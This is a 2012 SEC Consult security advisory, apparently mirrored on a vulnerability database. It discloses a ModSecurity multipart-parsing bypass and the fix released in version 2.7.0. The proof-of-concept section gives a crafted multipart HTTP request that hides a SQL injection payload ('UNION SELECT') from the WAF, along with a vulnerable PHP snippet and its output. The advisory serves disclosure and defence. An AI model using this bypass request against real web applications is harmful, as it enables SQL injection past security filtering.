Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28658
HistoryOct 22, 2012 - 12:00 a.m.

SEC Consult SA-20121017-0 :: ModSecurity multipart/invalid part ruleset bypass

2012-10-2200:00:00
vulners.com
46
JSON

SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >

          title: ModSecurity multipart/invalid part ruleset bypass
        product: ModSecurity

vulnerable version: <= 2.6.8
fixed version: 2.7.0
CVE number: -
impact: Depends what you use it for
homepage: http://www.modsecurity.org/
found: 2012-10-12
by: Bernhard Mueller
SEC Consult Vulnerability Lab
https://www.sec-consult.com

Vendor/product description:

ModSecurity for Apache is a web server plug-in for the Apache web server
platform. This is the original, most mature and deployed ModSecurity module.
This module is maintained by the Trustwave SpiderLabs Research Team.

URL: http://www.modsecurity.org/projects/modsecurity/apache/

Vulnerability overview/description:

Validation of POST parameters can be bypassed on Apache/PHP installations by
sending specially formed multipart requests. A POST parameter's content can be
hidden from ModSecurity by prepending an invalid part. This first part
contains only a Content-Disposition header and has an additional carriage
return inserted at the end of the line ([\r\r\n]). This is followed by a
boundary in the next line and another Content-Disposition header with a
filename. The request content looks like this (newlines are all \r\n except in
line 2).

–A
Content-Disposition: form-data; name="id"[\r][\r][\n]
–A
Content-Disposition: form-data; name="lol"; filename="x"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10–

–A–

ModSecurity skips what it believes to be an invalid first part and proceeds to
parse the second part. This part is treated as a file and not checked against
the ruleset.

PHP however treats the whole thing as a single part and processes only the
first Content-Disposition header, ignoring the second one. In the opinion of
PHP this request contains a POST parameter with the name specified in the
first header.

Proof of concept:

wut.php:

<? echo $POST[xxx] ?>

POST request:

POST /wut.php HTTP/1.1
Content-Type: multipart/form-data; boundary=A
Content-Length: 161

–A
Content-Disposition: form-data; name="xxx"[\r][\r][\n]
–A
Content-Disposition: form-data; name="yyy"; filename="z"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10–

–A–

Output:

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10–

(any change in the header should produce a 403)

Vulnerable / tested versions:

This works with ModSecurity up to version 2.6.8.

Vendor contact timeline:

2012-10-11: Contacted ModSecurity
2012-10-15: ModSecurity guys fixed it
2012-10-16: New ModSecurity release 2.7.0
2012-10-17: Public release of advisory

Solution:

To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure
that the MULTIPART_INVALID_PART flag is set in the multipart strict validation
rule. Add the line:

IQ %{MULTIPART_INVALID_PART}, \

to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.

Download is available at:

http://www.modsecurity.org/download/

Advisory URL:

https://www.sec-consult.com/en/advisories.html

The SEC Consult Group

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com


Office Singapore
4 Battery Road
#25-01 Bank of China Building
Singapore &#40;049908&#41;
Mail: office at sec-consult dot sg


Check out our blog at:
http://blog.sec-consult.com/


And this thing here:
http://wordpress.org/extend/plugins/mvis-security-center/


EOF B. Mueller / October 2012
JSON